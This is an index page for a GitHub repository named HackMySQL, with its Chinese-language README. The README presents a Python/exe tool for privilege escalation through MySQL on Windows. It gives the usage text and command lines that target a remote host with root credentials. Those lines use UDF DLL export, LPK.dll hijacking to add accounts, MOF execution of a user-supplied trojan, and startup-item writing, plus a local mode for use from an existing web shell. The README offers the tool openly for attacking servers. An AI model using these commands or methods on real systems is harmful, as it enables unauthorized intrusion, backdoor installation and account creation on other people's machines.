Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/T3st0r-Git/HackMySQL
Using To MySQL Elevate Privileges.
https://github.com/T3st0r-Git/HackMySQL
Last synced: 21 days ago
JSON representation
Using To MySQL Elevate Privileges.
- Host: GitHub
- URL: https://github.com/T3st0r-Git/HackMySQL
- Owner: T3st0r-Git
- Created: 2016-07-07T08:17:09.000Z (over 8 years ago)
- Default Branch: master
- Last Pushed: 2020-11-24T09:39:31.000Z (about 4 years ago)
- Last Synced: 2024-08-05T17:39:38.561Z (4 months ago)
- Language: Python
- Homepage:
- Size: 4.11 MB
- Stars: 173
- Watchers: 3
- Forks: 68
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - T3st0r-Git/HackMySQL - Using To MySQL Elevate Privileges. (Python)
README
# python-promoting-privileges
1.自动导出你的backdoor和mof文件,
2.自动判断mysql版本,根据版本不同导出UDF的DLL到不同目录,UDF提权
3.导出LPK.dll文件,劫持系统目录提权
4.写启动项提权
工具仅做方便使用,技术含量几乎没有。
用py脚本写的,也打包成exe了,个人用的还算顺手。
用法:
```
promote:PythonDemo v5est0r$ python root.py
__ _ __ __ ____ ___ _
/ _|_ _ ___| | _| \/ |_ _/ ___| / _ \| |
| |_| | | |/ __| |/ / |\/| | | | \___ \| | | | | Author:v5est0r
| _| |_| | (__| <| | | | |_| |___) | |_| | |___
|_| \__,_|\___|_|\_\_| |_|\__, |____/ \__\_\_____|
|___/usage: root.py [-h] [-a HOST] [-o PORT] [-u USER] [-p PASSWD] [-e EXECUTE]
[-m METHOD]fuckmysql
optional arguments:
-h, --help show this help message and exit
-a HOST, --host HOST MySQL server ip
-o PORT, --port PORT MySQL Port
-u USER, --user USER mysql UserName
-p PASSWD, --passwd PASSWD
mysql password
-e EXECUTE, --execute EXECUTE
command for UDF to execute
-m METHOD, --method METHOD
elevate method,eg:udf/mof/lpk/st
```
![Alt text](./pic/vashvJHVAJSHVCJHavj.png)我在虚拟机演示打包好的exe远程提权,坛子的老哥们都是明白人,我就不多说了,直接上图:
默认UDF提权,也可以`-m udf`指定方式,`-e ipconfig`指定执行的cmd,默认执行whoami:
```
root.exe -a 192.168.1.105 -p root -e "ver&whoami" -m udf
```![Alt text](./pic/jhfashvhavha.png)
有时候UDF无效,我们使用LPK.dll劫持:
```
root.exe -a 192.168.1.105 -p root -m lpk
```![Alt text](./pic/hasjhvjhas.png)
验证一下lpk是否加上账户:
![Alt text](./pic/hbashjvchjasvh.png)
有时候UDF和LPK都无效,目标是windows2003,还有机会,可以MOF:
把你的木马的hex复制到同目录的hex.txt就行了,程序会导出木马到指定目录,并用mof执行。
![Alt text](./pic/avavJHdaHjadkj.png)
每隔几秒就运行一次木马,有点尴尬,如何停止mof老司机都知道,我就不多说了。
![Alt text](./pic/hbajhvjhasJdavkjdJBAS.png)
有时候UDF和LPK都无效,那我们只能尝试被动写启动项:
```
root.exe -a 192.168.1.105 -p root -m st
```
![Alt text](./pic/jvaJHVJC.png)可能存在路径编码问题写不成功,你可以根据提示,用本地的MySQL连接上去,执行。
![Alt text](./pic/vqfjhvajshcvasnCAKQJ.png)
当然还有情况是远程提权,UDF不能创建plugin目录,网上流传的ADS流创建目录我是没有成功过,工具里加了ADS流创建目录的代码,那么我们删掉plugin目录,再远程试试:
![Alt text](./pic/jhvcajhvhacsHGXCfxafxG.png)
如上图,那就不行了,那么这种情况下,如果你有shell,在shell里的本地模式执行,就不一样了。
本地模式:
一般来说,php一般权限都是可以创建目录的,此处必须指定主机为`localhost或127.0.0.1`才会调用本地模式:
```
root.exe -a localhost -p root -e "ver&whoami" -m udf
```![Alt text](./pic/jqwhvdqhvhavshHHVJHV.png)